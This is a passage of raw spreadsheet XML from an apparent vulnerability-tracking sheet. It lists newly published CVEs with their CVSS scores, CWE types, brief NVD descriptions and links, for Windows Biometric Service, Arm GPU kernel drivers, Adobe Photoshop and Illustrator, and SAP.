t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B603" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C603" s="5" t="inlineStr"><is><t>CVE-2026-72994</t></is></c><c r="D603" s="5" t="n"><v>7.8</v></c><c r="E603" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F603" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G603" s="5" t="inlineStr" /><c r="H603" s="5" t="n"><v>0.002</v></c><c r="I603" s="5" t="inlineStr" /><c r="J603" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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3" s="5" t="inlineStr" /><c r="M603" s="5" t="inlineStr" /><c r="N603" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P603" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q603" s="5" t="inlineStr" /><c r="R603" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S603" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t></is></c></row><row r="604"><c r="A604" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B604" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C604" s="5" t="inlineStr"><is><t>CVE-2026-72995</t></is></c><c r="D604" s="5" t="n"><v>7.8</v></c><c r="E604" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F604" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G604" s="5" t="inlineStr" /><c r="H604" s="5" t="n"><v>0.002</v></c><c r="I604" s="5" t="inlineStr" /><c r="J604" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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4" s="5" t="inlineStr" /><c r="M604" s="5" t="inlineStr" /><c r="N604" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O604" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P604" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q604" s="5" t="inlineStr" /><c r="R604" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S604" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t></is></c></row><row r="605"><c r="A605" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B605" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C605" s="5" t="inlineStr"><is><t>CVE-2026-72996</t></is></c><c r="D605" s="5" t="n"><v>7.8</v></c><c r="E605" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F605" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G605" s="5" t="inlineStr" /><c r="H605" s="5" t="n"><v>0.003</v></c><c r="I605" s="5" t="inlineStr" /><c r="J605" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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5" s="5" t="inlineStr" /><c r="M605" s="5" t="inlineStr" /><c r="N605" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P605" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q605" s="5" t="inlineStr" /><c r="R605" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S605" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t></is></c></row><row r="606"><c r="A606" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C606" s="5" t="inlineStr"><is><t>CVE-2026-72997</t></is></c><c r="D606" s="5" t="n"><v>7.8</v></c><c r="E606" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F606" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G606" s="5" t="inlineStr" /><c r="H606" s="5" t="n"><v>0.003</v></c><c r="I606" s="5" t="inlineStr" /><c r="J606" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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6" s="5" t="inlineStr" /><c r="M606" s="5" t="inlineStr" /><c r="N606" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P606" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q606" s="5" t="inlineStr" /><c r="R606" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S606" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t></is></c></row><row r="607"><c r="A607" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B607" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C607" s="5" t="inlineStr"><is><t>CVE-2026-73000</t></is></c><c r="D607" s="5" t="n"><v>7.8</v></c><c r="E607" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F607" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G607" s="5" t="inlineStr" /><c r="H607" s="5" t="n"><v>0.002</v></c><c r="I607" s="5" t="inlineStr" /><c r="J607" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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7" s="5" t="inlineStr" /><c r="M607" s="5" t="inlineStr" /><c r="N607" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P607" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q607" s="5" t="inlineStr" /><c r="R607" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S607" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T607" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t></is></c></row><row r="608"><c r="A608" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B608" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C608" s="5" t="inlineStr"><is><t>CVE-2026-73001</t></is></c><c r="D608" s="5" t="n"><v>7.8</v></c><c r="E608" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F608" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G608" s="5" t="inlineStr" /><c r="H608" s="5" t="n"><v>0.003</v></c><c r="I608" s="5" t="inlineStr" /><c r="J608" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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8" s="5" t="inlineStr" /><c r="M608" s="5" t="inlineStr" /><c r="N608" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P608" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q608" s="5" t="inlineStr" /><c r="R608" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S608" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t></is></c></row><row r="609"><c r="A609" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B609" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C609" s="5" t="inlineStr"><is><t>CVE-2026-73002</t></is></c><c r="D609" s="5" t="n"><v>7.8</v></c><c r="E609" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F609" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G609" s="5" t="inlineStr" /><c r="H609" s="5" t="n"><v>0.002</v></c><c r="I609" s="5" t="inlineStr" /><c r="J609" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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9" s="5" t="inlineStr" /><c r="M609" s="5" t="inlineStr" /><c r="N609" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P609" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q609" s="5" t="inlineStr" /><c r="R609" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S609" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t></is></c></row><row r="610"><c r="A610" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C610" s="5" t="inlineStr"><is><t>CVE-2026-73007</t></is></c><c r="D610" s="5" t="n"><v>7.8</v></c><c r="E610" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F610" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G610" s="5" t="inlineStr" /><c r="H610" s="5" t="n"><v>0.002</v></c><c r="I610" s="5" t="inlineStr" /><c r="J610" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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0" s="5" t="inlineStr" /><c r="M610" s="5" t="inlineStr" /><c r="N610" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P610" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q610" s="5" t="inlineStr" /><c r="R610" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S610" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t></is></c></row><row r="611"><c r="A611" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C611" s="5" t="inlineStr"><is><t>CVE-2026-73011</t></is></c><c r="D611" s="5" t="n"><v>7.8</v></c><c r="E611" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F611" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G611" s="5" t="inlineStr" /><c r="H611" s="5" t="n"><v>0.002</v></c><c r="I611" s="5" t="inlineStr" /><c r="J611" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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1" s="5" t="inlineStr" /><c r="M611" s="5" t="inlineStr" /><c r="N611" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P611" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q611" s="5" t="inlineStr" /><c r="R611" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S611" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t></is></c></row><row r="612"><c r="A612" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B612" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C612" s="5" t="inlineStr"><is><t>CVE-2026-73014</t></is></c><c r="D612" s="5" t="n"><v>7.8</v></c><c r="E612" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F612" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G612" s="5" t="inlineStr" /><c r="H612" s="5" t="n"><v>0.003</v></c><c r="I612" s="5" t="inlineStr" /><c r="J612" s="5" t="inlineStr" /><c r="K612" s="5" t="inlineStr" /><c r="L612" s="5" t="inlineStr" /><c r="M612" s="5" t="inlineStr" /><c r="N612" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P612" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q612" s="5" t="inlineStr" /><c r="R612" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S612" s="5" t="inlineStr"><is><t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t></is></c></row><row r="613"><c r="A613" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B613" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C613" s="5" t="inlineStr"><is><t>CVE-2026-73015</t></is></c><c r="D613" s="5" t="n"><v>7.8</v></c><c r="E613" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F613" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G613" s="5" t="inlineStr" /><c r="H613" s="5" t="n"><v>0.002</v></c><c r="I613" s="5" t="inlineStr" /><c r="J613" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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3" s="5" t="inlineStr" /><c r="M613" s="5" t="inlineStr" /><c r="N613" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P613" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q613" s="5" t="inlineStr" /><c r="R613" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S613" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t></is></c></row><row r="614"><c r="A614" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B614" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C614" s="5" t="inlineStr"><is><t>CVE-2026-73020</t></is></c><c r="D614" s="5" t="n"><v>7.8</v></c><c r="E614" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F614" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G614" s="5" t="inlineStr" /><c r="H614" s="5" t="n"><v>0.002</v></c><c r="I614" s="5" t="inlineStr" /><c r="J614" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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4" s="5" t="inlineStr" /><c r="M614" s="5" t="inlineStr" /><c r="N614" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P614" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q614" s="5" t="inlineStr" /><c r="R614" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S614" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t></is></c></row><row r="615"><c r="A615" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B615" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C615" s="5" t="inlineStr"><is><t>CVE-2026-73021</t></is></c><c r="D615" s="5" t="n"><v>7.8</v></c><c r="E615" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F615" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G615" s="5" t="inlineStr" /><c r="H615" s="5" t="n"><v>0.003</v></c><c r="I615" s="5" t="inlineStr" /><c r="J615" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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5" s="5" t="inlineStr" /><c r="M615" s="5" t="inlineStr" /><c r="N615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P615" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q615" s="5" t="inlineStr" /><c r="R615" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S615" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t></is></c></row><row r="616"><c r="A616" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B616" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C616" s="5" t="inlineStr"><is><t>CVE-2026-73024</t></is></c><c r="D616" s="5" t="n"><v>7.8</v></c><c r="E616" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F616" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G616" s="5" t="inlineStr" /><c r="H616" s="5" t="n"><v>0.002</v></c><c r="I616" s="5" t="inlineStr" /><c r="J616" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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16" s="5" t="inlineStr" /><c r="M616" s="5" t="inlineStr" /><c r="N616" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P616" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q616" s="5" t="inlineStr" /><c r="R616" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S616" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t></is></c></row><row r="617"><c r="A617" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B617" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C617" s="5" t="inlineStr"><is><t>CVE-2026-73026</t></is></c><c r="D617" s="5" t="n"><v>7.8</v></c><c r="E617" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F617" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G617" s="5" t="inlineStr" /><c r="H617" s="5" t="n"><v>0.002</v></c><c r="I617" s="5" t="inlineStr" /><c r="J617" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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7" s="5" t="inlineStr" /><c r="M617" s="5" t="inlineStr" /><c r="N617" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P617" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q617" s="5" t="inlineStr" /><c r="R617" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S617" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t></is></c></row><row r="618"><c r="A618" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B618" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C618" s="5" t="inlineStr"><is><t>CVE-2026-7476</t></is></c><c r="D618" s="5" t="n"><v>7.8</v></c><c r="E618" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F618" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G618" s="5" t="inlineStr" /><c r="H618" s="5" t="n"><v>0.001</v></c><c r="I618" s="5" t="inlineStr" /><c r="J618" s="5" t="inlineStr" /><c r="K618" s="5" t="inlineStr" /><c r="L618" s="5" t="inlineStr" /><c r="M618" s="5" t="inlineStr" /><c r="N618" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P618" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q618" s="5" t="inlineStr" /><c r="R618" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S618" s="5" t="inlineStr"><is><t>Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to access already freed memory.



This issue affects Bifrost GPU Kernel Driver: from r49p3 through r49p5, r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0.</t></is></c><c r="T618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t></is></c></row><row r="619"><c r="A619" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B619" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C619" s="5" t="inlineStr"><is><t>CVE-2026-7477</t></is></c><c r="D619" s="5" t="n"><v>7.8</v></c><c r="E619" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F619" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G619" s="5" t="inlineStr" /><c r="H619" s="5" t="n"><v>0.001</v></c><c r="I619" s="5" t="inlineStr" /><c r="J619" s="5" t="inlineStr" /><c r="K619" s="5" t="inlineStr" /><c r="L619" s="5" t="inlineStr" /><c r="M619" s="5" t="inlineStr" /><c r="N619" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P619" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q619" s="5" t="inlineStr" /><c r="R619" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S619"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r44p0 through r49p4, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3; Arm 5th Gen GPU Architecture Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t></is></c></row><row r="620"><c r="A620" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B620" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C620" s="5" t="inlineStr"><is><t>CVE-2026-75631</t></is></c><c r="D620" s="5" t="n"><v>7.8</v></c><c r="E620" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F620" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G620" s="5" t="inlineStr" /><c r="H620" s="5" t="n"><v>0.002</v></c><c r="I620" s="5" t="inlineStr" /><c r="J620" s="5" t="inlineStr" /><c r="K620" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L620" s="5" t="inlineStr" /><c r="M620" s="5" t="inlineStr" /><c r="N620" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P620" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q620" s="5" t="inlineStr" /><c r="R620" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S620" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t></is></c></row><row r="621"><c r="A621" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B621" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C621" s="5" t="inlineStr"><is><t>CVE-2026-75771</t></is></c><c r="D621" s="5" t="n"><v>7.8</v></c><c r="E621" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F621" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G621" s="5" t="inlineStr" /><c r="H621" s="5" t="n"><v>0.002</v></c><c r="I621" s="5" t="inlineStr" /><c r="J621" s="5" t="inlineStr" /><c r="K621" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L621" s="5" t="inlineStr" /><c r="M621" s="5" t="inlineStr" /><c r="N621" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P621" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q621" s="5" t="inlineStr" /><c r="R621" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S621"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21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t></is></c></row><row r="622"><c r="A622" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C622" s="5" t="inlineStr"><is><t>CVE-2026-75862</t></is></c><c r="D622" s="5" t="n"><v>7.8</v></c><c r="E622" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F622" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G622" s="5" t="inlineStr" /><c r="H622" s="5" t="n"><v>0.002</v></c><c r="I622" s="5" t="inlineStr" /><c r="J622" s="5" t="inlineStr" /><c r="K622" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L622" s="5" t="inlineStr" /><c r="M622" s="5" t="inlineStr" /><c r="N622" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P622" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q622" s="5" t="inlineStr" /><c r="R622" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S622"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22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t></is></c></row><row r="623"><c r="A623" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B623" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C623" s="5" t="inlineStr"><is><t>CVE-2026-75863</t></is></c><c r="D623" s="5" t="n"><v>7.8</v></c><c r="E623" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F623" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G623" s="5" t="inlineStr" /><c r="H623" s="5" t="n"><v>0.002</v></c><c r="I623" s="5" t="inlineStr" /><c r="J623" s="5" t="inlineStr" /><c r="K623" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L623" s="5" t="inlineStr" /><c r="M623" s="5" t="inlineStr" /><c r="N623" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P623" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q623" s="5" t="inlineStr" /><c r="R623" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S623"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23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t></is></c></row><row r="624"><c r="A624" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C624" s="5" t="inlineStr"><is><t>CVE-2026-75992</t></is></c><c r="D624" s="5" t="n"><v>7.8</v></c><c r="E624" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F624" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G624" s="5" t="inlineStr" /><c r="H624" s="5" t="n"><v>0.002</v></c><c r="I624" s="5" t="inlineStr" /><c r="J624" s="5" t="inlineStr" /><c r="K624" s="5" t="inlineStr" /><c r="L624" s="5" t="inlineStr" /><c r="M624" s="5" t="inlineStr" /><c r="N624" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P624" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q624" s="5" t="inlineStr" /><c r="R624" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S624" s="5" t="inlineStr"><is><t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t></is></c></row><row r="625"><c r="A625" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C625" s="5" t="inlineStr"><is><t>CVE-2026-76967</t></is></c><c r="D625" s="5" t="n"><v>7.8</v></c><c r="E625" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F625" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G625" s="5" t="inlineStr" /><c r="H625" s="5" t="n"><v>0.002</v></c><c r="I625" s="5" t="inlineStr" /><c r="J625" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K625" s="5" t="inlineStr" /><c r="L625" s="5" t="inlineStr" /><c r="M625" s="5" t="inlineStr" /><c r="N625" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O625" s="5" 